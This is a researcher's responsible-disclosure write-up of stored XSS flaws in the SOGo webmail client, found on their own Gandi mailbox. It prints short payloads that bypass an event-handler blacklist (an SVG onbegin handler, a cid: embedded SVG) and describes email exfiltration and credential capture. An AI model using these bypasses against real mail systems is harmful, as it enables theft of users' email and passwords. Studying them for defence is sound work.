In my spare time I like to search for vulnerabilities in web applications as part of various vulnerability disclosure programs (VDPs). One program I had been working on introduced me to the SOGo webmail client. Inverse, who maintain SOGo along with a community of developers, describe it as “a fully supported and trusted groupware server with a focus on scalability and open standards”. It offers more than just webmail, but that is what we are focusing on in this article. SOGo is open source and there are some large companies and organisations that use it. One of those organisations is the one that brought the application to my attention through their VDP.
I cannot disclose the details of the program, but I did find several vulnerabilities, one of which was critical. Unfortunately the webmail client was deemed out of scope for the VDP. The issues were raised with Inverse and fixed promptly but I chose to part ways with the VDP.
Following successful remedial work by Inverse, I decided to read some of the source code, starting with the fixes that had been made, it was open source after all. No longer working on the original VDP, instead I was using an instance of SOGo managed by Gandi, a domain name registrar, hosting and email provider.
The SOGo webmail client application is written in Objective-C which I have no experience in. That aside, I found the file that had been amended as part of the fix, and started reading. It quickly became apparent that there could be further issues with similar payloads to what I had used previously.
<img src onerror='alert()'/>
With the knowledge of the approach being used, I began to research HTML events, learning about obscure ones that I have never used or come across before. Then it was a case of comparing these against the blacklist in the SOGo code. It didn’t take long to find ones that were not present.
<svg> <animate attributename="x" dur="1s" onbegin="alert()"> </animate> </svg>
I successfully modified the script so that it could read and delete emails from the inbox, and so that it could send data out to an external server. In the image below you can see two emails in the victims inbox. One is benign and the other contains a malicious payload.
After opening the malicious email, the contents of the other email in the inbox is sent to the attacker’s server. The image below shows the content captured by the attacker (the email subject is highlighted in yellow).
With the impact of the vulnerability determined, I contacted Gandi, whose instance of SOGo I had been experimenting on. They had information at /.well-known/security.txt (a reserved address for security related information) which allowed me to contact the right people quickly. Within a few hours I had provided all of the information on the issue and a dialogue was open. Gandi agreed that they would contact Inverse to raise the vulnerability with them.
While Open Source code is great for many reasons. There is a downside which in this instance is all too clear. The open nature of the code meant that I was able to find the vulnerability not through mass trial and error, but instead through targeted attempts based on my understanding of what the application was doing. Arguably, this makes the code easier to attack. That is not to say that open source code is less secure. Merely, that if vulnerabilities are there, they can be easier to find than in closed software. It is also often the case that vulnerabilities are found and fixed more swiftly with open source as compared with closed source software. What is important, is if you are using any kind of third party code/software, that you evaluate it yourself and always keep it up to date. With open source, it is harder to announce security vulnerabilities without giving attackers the precise ammunition against users still on older versions. This is because the fix is there for all to see, and often the fix will reveal the attack vector.
As it turns out, the fix (fix #1) that SOGo implemented almost picked up on this, an almost identical “else if” has been added but this time with the correct casing, and now all attributes beginning “on” are blocked.
The login form acts as a keylogger and sends the victim’s username and password to the attacker’s server, then sends the user back to the inbox, none the wiser.
At this point it would be worth mentioning the CSP header, as touched on earlier. CSP is a way of telling the browser what resources your website is allowed to request. These days it is a very useful tool to help prevent XSS. In the examples given here, a CSP would have likely prevented the XSS vulnerabilities from being usable. At the very least it would have made it a lot harder. For example, if the CSP prevented the attacker’s server from being called, there would be no way of exfiltrating the data off of the webmail client. Yes there would still be a XSS hole, but it would be defused. That said, CSP should not be solely relied upon and systems should still be regularly tested for XSS vulnerabilities. But in instances where vulnerabilities are introduced, CSP can be a very useful safety net.
As is normal with vulnerability disclosure, I needed to wait a period of time before I could publish this article. During that time I occasionally dipped back into looking for further exploits. During my original investigations I became aware that if I could determine the ID of a malicious email that had been sent, I would be able to embed a malicious SVG and have it execute via an embed tag. This was because the attachments are served on the same domain and have a predictable URL (which includes the email ID, an integer). Requests to the SVG would send along the relevant auth cookie and allow script to be run under the victims context (another XSS attack). However, in the absence of being able to run any script from the email body I was at a loss to how I could predetermine the URL of the malicious attachment I was sending. But looking at the code again, I realised that I didn’t need to know the full URL, thanks to the way it handles images embedded in emails.
Within emails you can embed images in the body content in different ways. One way is using a Content-ID. This is where you attach a file as a regular attachment and then reference that attachment using a Content-ID.
<img src="cid:filename.jpg" />
The SOGo application code normally rewrites “src” attributes to “unsafe-src” to prevent them being rendered. However, there is a special clause which allows them through if the contents is a CID and that filename is attached. Suddenly, I didn’t need to know the full URL of the SVG on the server, just the filename (which the sender controls). I sent a test email with the following body content and it worked.
<embed type="image/svg+xml" src="cid:my-really-safe-file.svg"></embed>
It took a few tweaks to the payload I used in the first hack but then I was successfully sending the contents of other emails out to my external server again. All the victim had to do was open the email. I notified Inverse and a fix was applied shortly after (fix #5).
It is important to remember the threat SVGs can pose. If you allow an external actor to supply an SVG which is subsequently displayed to the user in a way that will execute internal scripts, mitigations need to be put in place. There are numerous ways of dealing with this which is beyond the scope of this article. If in doubt, block external SVGs.
During the course of my experiments, I always acted on my own Gandi mailbox and did not attempt to access the data of any other user. Both Gandi and Inverse reacted quickly when these issues were brought to their attention. I notified both companies of the intention to publish this article and allowed 90 days from reporting the last critical issue before doing so. This was to allow time to fix vulnerabilities, roll out releases and for consumers to upgrade their instances of SOGo.
For a full demonstration of the XSS vulnerabilities discussed in this article, watch the video below.
For a demonstration of stealing credentials by hijacking the email buttons, watch the second video below.